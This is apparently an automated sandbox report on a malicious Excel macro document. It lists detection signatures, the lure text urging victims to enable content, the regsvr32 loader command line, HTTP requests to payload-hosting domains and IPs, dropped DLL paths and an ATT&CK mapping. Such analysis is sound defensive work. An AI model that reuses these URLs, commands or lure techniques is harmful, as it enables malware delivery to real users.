Loading ...

Play interactive tourEdit tour

Analysis Report documents-1660683173.xlsm

Overview

General Information

Sample Name:documents-1660683173.xlsm
Analysis ID:382825
MD5:cf8cbce9bb25d9081b2da19c6f1c1c70
SHA1:e014ec63d11a673fd6a655cb20055a723eba2fe5
SHA256:9a59e089d7b593c0b0651ad43945f19c10c67719b7e01814f4007f253db6e286
Tags:xlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Machine Learning detection for dropped file
Office process drops PE file
Allocates a big amount of memory (probably used for heap spraying)
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1324 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2380 cmdline: regsvr32 -s ..\oeiwkd MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2300 cmdline: regsvr32 -s MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2296 cmdline: regsvr32 -s MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2788 cmdline: regsvr32 -s MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2824 cmdline: regsvr32 -s MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Machine Learning detection for dropped fileShow sources
    Source: C:\Users\user\oeiwkd4.dllJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\index[1].htmJoe Sandbox ML: detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (creates forbidden files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oeiwkd4.dllJump to behavior
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: index[1].htm.0.drJump to dropped file
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Source: excel.exeMemory has grown: Private usage: 4MB later: 125MB
    Source: global trafficDNS query: name: katelynn9506a.ru.com
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 8.211.4.209:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 8.211.4.209:80

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
    Source: TrafficSnort IDS: 2009897 ET TROJAN Possible Windows executable sent when remote host claims to send html content 111.118.215.222:80 -> 192.168.2.22:49169
    Source: Joe Sandbox ViewIP Address: 8.211.4.209 8.211.4.209
    Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: katelynn9506a.ru.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: corwin-tommie06f.ru.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/index.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kautilyaclasses.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/index.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kullumanalitours.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/index.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bodylanguage.santulan.co.inConnection: Keep-Alive
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0058FDE.pngJump to behavior
    Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: katelynn9506a.ru.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: corwin-tommie06f.ru.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/index.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kautilyaclasses.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/index.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kullumanalitours.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/index.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bodylanguage.santulan.co.inConnection: Keep-Alive
    Source: unknownDNS traffic detected: queries for: katelynn9506a.ru.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Tue, 06 Apr 2021 16:01:02 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16X-Powered-By: PHP/5.4.16Content-Length: 78Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e Data Ascii: <h1>Not Found.</h1>The requested URL /index.html was not found on this server.
    Source: regsvr32.exe, 00000003.00000002.2087890614.0000000001D50000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2088839206.0000000001D30000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2089763192.0000000001E30000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2091065078.0000000001D80000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2092198961.0000000001D80000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing, please click Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18
    Source: Screenshot number: 4Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
    Source: Document image extraction number: 9Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
    Source: Document image extraction number: 9Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Screenshot number: 8Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
    Source: Screenshot number: 8Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: documents-1660683173.xlsmInitial sample: EXEC
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: documents-1660683173.xlsmInitial sample: Sheet size: 27819
    Office process drops PE fileShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oeiwkd4.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\index[1].htmJump to dropped file
    Source: workbook.xmlBinary string: " sheetId="5" r:id="rId1"/><sheet name="Doc1" sheetId="4" r:id="rId2"/><sheet name="Doc2" sheetId="1" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_open">'Doc1'!$AO$41</definedName></definedNames><calcPr calcId="122211"/></workbook>
    Source: classification engineClassification label: mal100.expl.evad.winXLSM@11/12@5/4
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$documents-1660683173.xlsmJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBF77.tmpJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\oeiwkd
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\oeiwkdJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: documents-1660683173.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: documents-1660683173.xlsmInitial sample: OLE zip file path = xl/media/image2.png
    Source: documents-1660683173.xlsmInitial sample: OLE zip file path = xl/media/image3.png
    Source: documents-1660683173.xlsmInitial sample: OLE zip file path = xl/media/image4.png
    Source: documents-1660683173.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: documents-1660683173.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: documents-1660683173.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oeiwkd4.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\index[1].htmJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oeiwkd4.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\index[1].htmJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oeiwkd4.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\oeiwkd4.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\index[1].htmJump to dropped file
    Source: Yara matchFile source: app.xml, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading121OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution43Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting21NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\oeiwkd4.dll100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\index[1].htm100%Joe Sandbox ML

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://corwin-tommie06f.ru.com/index.html0%Avira URL Cloudsafe
    http://kautilyaclasses.com/ds/index.html0%Avira URL Cloudsafe
    http://katelynn9506a.ru.com/index.html0%Avira URL Cloudsafe
    http://bodylanguage.santulan.co.in/ds/index.html0%Avira URL Cloudsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe
    http://kullumanalitours.com/ds/index.html0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    kautilyaclasses.com
    192.185.56.250
    truefalse
      unknown
      bodylanguage.santulan.co.in
      111.118.215.222
      truetrue
        unknown
        corwin-tommie06f.ru.com
        8.211.4.209
        truefalse
          unknown
          katelynn9506a.ru.com
          8.211.4.209
          truefalse
            unknown
            kullumanalitours.com
            103.211.216.55
            truefalse
              unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://corwin-tommie06f.ru.com/index.htmlfalse
              • Avira URL Cloud: safe
              unknown
              http://kautilyaclasses.com/ds/index.htmlfalse
              • Avira URL Cloud: safe
              unknown
              http://katelynn9506a.ru.com/index.htmlfalse
              • Avira URL Cloud: safe
              unknown
              http://bodylanguage.santulan.co.in/ds/index.htmltrue
              • Avira URL Cloud: safe
              unknown
              http://kullumanalitours.com/ds/index.htmlfalse
              • Avira URL Cloud: safe
              unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2087890614.0000000001D50000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2088839206.0000000001D30000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2089763192.0000000001E30000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2091065078.0000000001D80000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2092198961.0000000001D80000.00000002.00000001.sdmpfalse
              • Avira URL Cloud: safe
              low

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              103.211.216.55
              kullumanalitours.comSeychelles
              394695PUBLIC-DOMAIN-REGISTRYUSfalse
              192.185.56.250
              kautilyaclasses.comUnited States
              46606UNIFIEDLAYER-AS-1USfalse
              8.211.4.209
              corwin-tommie06f.ru.comSingapore
              45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
              111.118.215.222
              bodylanguage.santulan.co.inIndia
              394695PUBLIC-DOMAIN-REGISTRYUStrue

              General Information

              Joe Sandbox Version:31.0.0 Emerald
              Analysis ID:382825
              Start date:06.04.2021
              Start time:18:00:12
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 43s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:documents-1660683173.xlsm
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Number of analysed new started processes analysed:9
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.expl.evad.winXLSM@11/12@5/4
              EGA Information:Failed
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .xlsm
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Attach to Office via COM
              • Scroll down
              • Close Viewer
              Warnings:
              Show All
              • Exclude process from analysis (whitelisted): dllhost.exe

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              8.211.4.2091234.xlsmGet hashmaliciousBrowse
              • mills-skyla30ec.com/gg.gif
              12345.xlsmGet hashmaliciousBrowse
              • mills-skyla30ec.com/gg.gif
              1234.xlsmGet hashmaliciousBrowse
              • mills-skyla30ec.com/gg.gif
              documents-748443571.xlsmGet hashmaliciousBrowse
              • mills-skyla30ec.com/gg.gif
              12345.xlsmGet hashmaliciousBrowse
              • mills-skyla30ec.com/gg.gif
              documents-1887159634.xlsmGet hashmaliciousBrowse
              • mills-skyla30ec.com/gg.gif
              documents-748443571.xlsmGet hashmaliciousBrowse
              • mills-skyla30ec.com/gg.gif
              documents-1887159634.xlsmGet hashmaliciousBrowse
              • mills-skyla30ec.com/gg.gif
              documents-683917632.xlsmGet hashmaliciousBrowse
              • mills-skyla30ec.com/gg.gif
              documents-683917632.xlsmGet hashmaliciousBrowse
              • mills-skyla30ec.com/gg.gif
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • mills-skyla30ec.com/gg.gif
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • mills-skyla30ec.com/gg.gif
              111.118.215.2222.docGet hashmaliciousBrowse
              • www.sewakalharamain.com/we/?id=eCqvZjB9yzZjHVFsBS3mbpFyF5bew9YaktCBlpiiLzXEFgX7f8Dr16PTLdsD9yaPgJU3/B/m1OJYSyq3LB7PQg==&6lv=zfMHXnZ0VbCxh&sql=1

              Domains

              No context

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC0406_37400496097832.docGet hashmaliciousBrowse
              • 8.208.95.92
              32_64_ver_2_bit.exeGet hashmaliciousBrowse
              • 8.209.67.151
              1234.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              12345.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              1234.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-748443571.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              12345.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-1887159634.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-748443571.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-1887159634.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              L87N50MbDG.exeGet hashmaliciousBrowse
              • 8.209.67.151
              documents-683917632.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-683917632.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              Proforma invoice.docGet hashmaliciousBrowse
              • 47.244.190.114
              yPkfbflyoh.exeGet hashmaliciousBrowse
              • 8.208.95.18
              4CwmE1pYh5.exeGet hashmaliciousBrowse
              • 47.91.72.80
              com.multicamera.coolwending.translator.apkGet hashmaliciousBrowse
              • 47.253.30.230
              JYDy1dAHdW.exeGet hashmaliciousBrowse
              • 8.208.95.18
              UNIFIEDLAYER-AS-1US06iKnPFk8Y.dllGet hashmaliciousBrowse
              • 162.241.54.59
              06iKnPFk8Y.dllGet hashmaliciousBrowse
              • 162.241.54.59
              ddff.exeGet hashmaliciousBrowse
              • 108.179.235.108
              PowerShell_Input.ps1Get hashmaliciousBrowse
              • 162.241.61.203
              New PO#700-20-HDO410444RF217,pdf.exeGet hashmaliciousBrowse
              • 192.185.122.118
              Purchase Order.9000.scan.pdf...exeGet hashmaliciousBrowse
              • 162.241.148.243
              document-1848152474.xlsmGet hashmaliciousBrowse
              • 192.185.48.186
              7z7Q51Y8Xd.dllGet hashmaliciousBrowse
              • 162.241.54.59
